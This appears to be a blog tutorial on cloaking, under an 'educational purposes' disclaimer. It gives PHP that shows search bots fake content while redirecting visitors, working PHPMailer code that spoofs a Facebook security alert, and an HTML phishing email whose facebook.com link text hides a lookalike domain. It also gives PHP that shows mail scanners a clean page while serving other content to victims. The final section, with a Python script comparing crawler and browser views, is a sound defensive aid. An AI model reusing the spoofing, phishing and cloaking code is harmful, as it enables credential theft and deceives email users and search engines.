
If you like my work show support on my Patreon

[Figure: Visual Diagram To Explain Cloaking]

Disclaimer: I’m not responsible for any actions you do by using the information provided in this article. It is strictly for educational purposes.

Cloaking is a tactic used in black hat communities to trick people, or even other websites, into thinking the content on a site is something different than it is.

There are several reasons why someone may want to cloak a website. However, most of the reasons are simply for personal gain, by deceiving other people or programs.

It is worth noting that this is a very gray topic that isn't considered legal or illegal. It is debated often, and policies by third party sites differ on the subject. Some sites support such methods; others frown upon them.

Scenario 1

A person has several websites. One website is doing very well in Google, but the other sites are doing very poorly. The other sites may be doing poorly because of competition, which makes it hard to compete. The person then comes up with an idea.

The person sells beauty products, and their website is doing well because the name of the site is beautyproducts.com. They can get their other sites that aren't doing well to do just as well.

Let's say the person's poorest performing site is gobbledygook.com, and the search query on Google for gobbledy gook only has 436,000 search results. That is a lot less competition than the search term beauty products, which has 216,000,000 search results. So we can increase our beauty products website revenue by taking advantage of the lack of competition that gobbledy gook has.

[Figure: search for "beauty". This search displays 216,000,000 results, making competition more difficult.]
[Figure: search for "gobbledy-gook". This search displays 436,000 results, making competition easier.]

The most basic way of doing this would be a 301 redirect.

<meta http-equiv="refresh" content="0;URL=http://www.beautyproducts.com" />

However, this method is so commonly used that many sites ban sites that use the above code, and Google doesn't index sites that have the above code. So what can we do?

Well, we know that one of the spiders that Google uses to index websites is called Googlebot. So we can identify the User Agent string of Googlebot, which is googlebot, and make the site display legitimate content for Google to index.

We might make the site say something like the following.

Gobbledy Gook is so delicious I eat it with every meal. It taste so good and here is a great Gobbledy Gook recipe for you. So on and so on.

Now we put that site into some user agent identifier code written in PHP.

if (strpos($_SERVER['HTTP_USER_AGENT'],"Googlebot"))
{
echo "Gobbledy Gook is so delicious I eat it with every meal. It taste so good and here is a great Gobbledy Gook recipe for you. So on and so on.";
}

Now Google thinks the site is legitimate and will index it normally. But let's add to the code so regular users will get redirected.


if (strpos($_SERVER['HTTP_USER_AGENT'],"Googlebot"))
{
echo "Gobbledy Gook is so delicious I eat it with every meal. It taste so good and here is a great Gobbledy Gook recipe for you. So on and so on.";
}
else
{
echo '<meta http-equiv="refresh" content="0;URL=http://www.beautyproducts.com" />';
}

[Figure: Real World Example]

Now it is important to understand that this method will work on smaller search engines. Major search engines have grown wise to such tactics and take proper measures to prevent this. But this is just a basic concept of how cloaking works.

Scenario 2

You're running a massive E-Mail blasting campaign and blasting your website out to thousands of E-Mails. But you notice people aren't as interested in the site and aren't clicking on the link you provide them with. Maybe they have grown wise and don't trust links you send.

You can use three methods and combine them to be able to get people to click the links you send them.

  1. Spoof The E-Mail
  2. Spoof The Link
  3. Cloak The URL

Spoof The E-Mail

To spoof the E-Mail so it appears to be coming from some place like Facebook we will simply put PHPMailer on our server. Then we will use the SendMail feature in the PHPMailer package.

require '../PHPMailerAutoload.php';
$mail = new PHPMailer;
$mail->isSendmail();
//Set who the message is to be sent from
$mail->setFrom([email protected]', 'Facebook');
//Set who the message is to be sent to
$mail->addAddress([email protected]', 'John Doe');
$mail->Subject = 'Unauthorized Login Attempt';
//Read an HTML message body from an external file, convert referenced images to embedded,
//convert HTML into a basic plain-text alternative body
$mail->msgHTML(file_get_contents('spoof-fbmsg.html'), dirname(__FILE__));
//Replace the plain text body with one created manually
$mail->AltBody = 'Dear facebook user we noticed a suspicious login from an IP address located in China. Please go to the following link http://fbsafety.com';
//Attach an image file
$mail->addAttachment('images/facebook-logo.png');
$mail->send();

The above code will send an E-Mail to a Gmail account that appears to be coming from facebook. The setFrom tells the user's E-Mail to display the from address as [email protected] even though facebook isn't sending the message; it makes the incoming mail server think it is.

addAddress is the person the message would be sent to. In a real world example you would probably have a list of E-Mail addresses in a database and use a for loop to loop through all the email addresses and send the same message to all E-Mails in the database.

The Subject should be self explanatory. It is the subject of the E-Mail.

Now msgHTML needs a bit of explaining. E-Mails can display graphically if they are set to do so. If they display graphically, then HTML code in the E-Mail displays the same way it would be displayed on a website. So when you get those pretty E-Mails with images and banners and everything, that is all HTML. We can use msgHTML to make a near replica of a facebook E-Mail.

AltBody is used if the E-Mail can’t accept HTML content. This will remove all graphics from the E-Mail. This includes href html links. So we need to just provide a full URL that we own but looks like it belongs to someone else. In this example I used http://fbsafety.com which will be displayed to the user just like that. We can use the same address in the HTML version but make it look a bit more official. That will be explained next when we cloak the Link.

Cloaking The Link

If we look at the above sendmail.php example code, we will notice we have a file called spoof-fbmsg.html. Let's examine what may be in this file.

<html>
<head>
<title>Facebook Security</title>
</head>
<body>
<div style="color: #0000ff; width: 100%;">
<img src="facebook-logo.png" />
</div>
<p>Dear facebook user we noticed a suspicious login from an IP address located in China. Please go to the following link <a href="http://fbsafety.com">http://www.facebook.com/password-change.php</a></p>
</body>
</html>

Notice the part in the red? The http://fbsafety.com is where the user will get directed to when he/she clicks the link. But the user sees http://www.facebook.com/password-change.php so the user is tricked into thinking they are really clicking on a real facebook link.

The part in blue could be an image that has a malicious program bound to it. I spoke about file binding in another post.

URL Cloaking

If the URL we are using is new, then there won't be any problems. However, if the attacker wants to make sure that the URL is always good to use and doesn't want to risk it being blacklisted, he/she will add cloaking to the URL.


if (strpos($_SERVER['HTTP_USER_AGENT'],"emailbot") || strpos($_SERVER['HTTP_REFERER'],"google.com/_/scs/mail-static/"))
{
echo "Yes I'm very legit Google I'm only deceiving you while victimizing everyone else.";
}
else
{
echo "Some content I want to provide to the user.";
}

As you can see the code above is similar to the cloaking code we made earlier. And it can be more complex as well.

Prevention

Many well established sites have done many things to prevent cloaking and provide a safer environment to their users. It is important to note that on the black market there are companies that provide cloaking services that are so advanced that they can even trick well established sites like Google.



However, let's assume this is a small scale operation. And let's assume you accept website submissions from users, so the users can get backlinks from your site. And let's assume you don't have time to manually check every link, so you use a bot to add the links to the site.

One of the 1000’s of methods Google uses to check such sites is simply using bots with user agent strings that look like web browser user agent strings.

So Google will have several bots: its famous Googlebot, and then it may have another bot that looks like Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0, which is the user agent string of the 64bit Linux version of Firefox. It then scrapes the content using both bots and compares them. If the contents change considerably, it flags the site for further review.
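
The two-bot comparison described above can be sketched for a small link-submission site as follows. This is an added example, not code from the original article or from Google; the function names, the 0.6 similarity threshold and the two sample pages are assumptions constructed for illustration.

```python
import difflib
import re
import urllib.request
from html.parser import HTMLParser

# Browser UA is the one quoted in the article; crawler UA is Googlebot's published string.
CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"

class _Page(HTMLParser):
    def __init__(self):
        super().__init__()
        self.text, self.refresh = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content") or "", re.I)
            self.refresh = m.group(1).strip("'\"") if m else ""
    def handle_data(self, data):
        self.text.append(data)

def summarize(html):
    """Return (whitespace-normalized text, meta refresh target or None)."""
    page = _Page()
    page.feed(html)
    return " ".join("".join(page.text).split()), page.refresh

def compare_views(crawler_html, browser_html, threshold=0.6):
    """Flag a site whose crawler view and browser view differ considerably."""
    c_text, c_refresh = summarize(crawler_html)
    b_text, b_refresh = summarize(browser_html)
    ratio = difflib.SequenceMatcher(None, c_text, b_text).ratio()
    reasons = []
    if ratio < threshold:  # assumed cut-off, tune it on known-good sites
        reasons.append("content differs between user agents")
    if b_refresh != c_refresh:
        reasons.append("redirect differs between user agents")
    return {"similarity": round(ratio, 2), "flag": bool(reasons), "reasons": reasons,
            "browser_redirect": b_refresh}

def fetch(url, user_agent, timeout=10):
    """Fetch url with the given User-Agent, reading at most 1 MB of the body."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read(1_000_000).decode("utf-8", "replace")

# Constructed sample views modelled on the Scenario 1 page: what each user agent receives.
CRAWLER_VIEW = "<html><body><p>Gobbledy Gook is so delicious I eat it with every meal.</p></body></html>"
BROWSER_VIEW = '<html><head><meta http-equiv="refresh" content="0;URL=http://www.beautyproducts.com" /></head></html>'
```

For a submitted link, call compare_views(fetch(url, CRAWLER_UA), fetch(url, BROWSER_UA)) and hold the submission for manual review when flag is true. A cloaker that keys on source IP address rather than on the User-Agent header will serve both requests the same page, so matching views do not prove a site is clean.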

If you're a user who is receiving such an E-Mail, you can hover over links. Browsers will show the URL the link will be going to in the lower left hand corner of the web browser.

More advanced users may want to right click the link, copy the link location, and use wget to fetch the page in question.

wget http://fbsafety.com

After fetching the page, you can open it up in your preferred text editor and view the source code. Alternatively, if you're using Firefox, right click the link, choose copy link location, then open up a new tab, type view-source: in the address bar, paste the link directly after that, and press enter.

view-source:http://fbsafety.com
